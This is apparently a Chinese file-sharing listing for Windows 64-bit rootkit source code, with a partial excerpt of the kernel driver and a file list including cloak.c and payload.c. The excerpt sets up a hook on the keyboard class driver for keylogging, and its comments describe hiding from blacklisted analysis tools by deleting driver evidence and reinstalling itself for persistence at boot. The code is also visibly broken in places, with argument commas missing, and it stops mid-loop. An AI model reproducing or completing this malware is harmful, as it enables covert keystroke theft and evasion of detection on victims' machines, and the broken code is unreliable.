资源简介
德国人写的win64位RootKit源代码。
代码片段和文件信息
//!!!THIS CODE FULLY WORKING!!! SURE!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#include “cloak.h“
///Distance between an ASCII lower-case letter and its upper-case form.
///Not referenced by the code in this excerpt: mystrcmp below folds case with the literal 32 instead.
#define TOUPPER_DELTA (‘a‘ - ‘A‘)
///Forward declarations; the definitions are not part of this excerpt.
void PrepOnBoot(PVOID pParameter);
void PrepOnShutdown(PVOID pParameter);
void CreateRandName(PWCHAR pRandDrvName ULONG length);
BOOL mystrcmp(const WCHAR* prefix, WCHAR* testStr, ULONG lengthGiven, PARSEMETHOD parseMethod){
    ///Case-insensitive search for `prefix` inside `testStr`.
    ///`lengthGiven` is a byte count and is halved to get the number of WCHARs in testStr.
    ///`prefix` is expected to be lower-case already; ASCII 'A'..'Z' in testStr are folded
    ///to lower-case before comparing, other characters are compared as-is.
    ///With METHOD_END only the tail of testStr (the last prefix-length characters) is
    ///examined; with any other method every window of testStr is tried in turn.
    ///Returns TRUE on a match, FALSE otherwise or when either pointer is NULL.
    ULONG nChars = lengthGiven >> 1;
    if (prefix == NULL || testStr == NULL) {
        return FALSE;
    }
    ULONG prefixLen = 0;
    while (prefix[prefixLen] != 0) {
        prefixLen++;
    }
    if (prefixLen > nChars) {
        return FALSE;
    }
    SIZE_T lastOff = (SIZE_T)(nChars - prefixLen);
    SIZE_T off = (parseMethod == METHOD_END) ? lastOff : 0;
    for (; off <= lastOff; off++) {
        SIZE_T k = 0;
        while (k < prefixLen) {
            WCHAR c = testStr[off + k];
            if (c > 64 && c < 91) {
                c = (WCHAR)(c + 32);   ///fold ASCII upper-case to lower-case
            }
            if (prefix[k] != c) {
                break;
            }
            k++;
        }
        if (k >= prefixLen) {
            return TRUE;
        }
    }
    return FALSE;
}
void InitThread(PVOID pStartContext){
///System-thread entry point: prints a marker, hands `pStartContext` to
///ExQueueWorkItem on DelayedWorkQueue, then ends the thread with
///PsTerminateSystemThread. Nothing after the terminate call runs.
///NOTE(review): pStartContext is passed through untouched; it is presumably a
///work-queue item prepared by the caller — confirm against the caller.
DbgPrint(“Hello from InitThread“);
ExQueueWorkItem(pStartContext DelayedWorkQueue);
PsTerminateSystemThread(0x0);
}
///This is the main thread responsible for both cloaking and persistence.
///At the beginning we do some keylogger initialization.
///Then we check whether any blacklisted processes exist. If not, we repeat until we detect a blacklisted
///process. If so, all driver evidence will be deleted.
///Then we perform a passive wait on the first blacklisted process we find.
///Once the wait is satisfied (process terminated) we install us again in the system so we will be started at next boot.
void SenseThread(PVOID pStartContext){
UNREFERENCED_PARAMETER(pStartContext);
DbgPrint(“Hello from SenseThread“);
LARGE_INTEGER interval;
NTSTATUS ntstatus = STATUS_UNSUCCESSFUL;
PUNICODE_STRING pProcessName;
UNICODE_STRING uKbdDrvName;
PEPROCESS pEprocess;
PDRIVER_object pKbdDrvObj = NULL;
interval.QuadPart = -1500000;
InitializeListHead(&(g_pKbdHookInfo->queueListHead));
KeInitializeSpinLock(&(g_pKbdHookInfo->queueSpinLock));
KeInitializeSemaphore(&(g_pKbdHookInfo->queueSemaphore) 0 MAXLONG);
///Try to directly access the keyboard class driver
RtlInitUnicodeString(&uKbdDrvName L“\\Driver\\kbdclass“);
for (;;){
ntstatus = ObReferenceobjectByName(&uKbdDrvName OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE NULL 0 IoDriverobjectType KernelMode NULL &pKbdDrvObj);
if (NT_SUCCESS(ntstatus)){
break;
}
KeDelayExecutionThread(KernelMode FALSE &interval);
}
BOOL isPatched = FALSE;
PETHREAD pEthread;
for (;;){
pEprocess = NULL;
pProcessName = NULL;
pEthread = NULL;
DbgPrint(“object not opened (0x%lX) starting next iteration.“ ntstatus);
///In our situation a polling approach is much easier than issuing a NtQuerySystemInformation call.
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 15664 2014-09-21 19:42 cloak.c
文件 153 2014-08-07 01:07 cloak.h
文件 82064 2014-09-21 20:00 drvtricks.h
文件 8380 2014-09-21 19:48 main.c
文件 12045 2014-09-21 19:56 payload.c
文件 311 2014-09-21 19:58 payload.h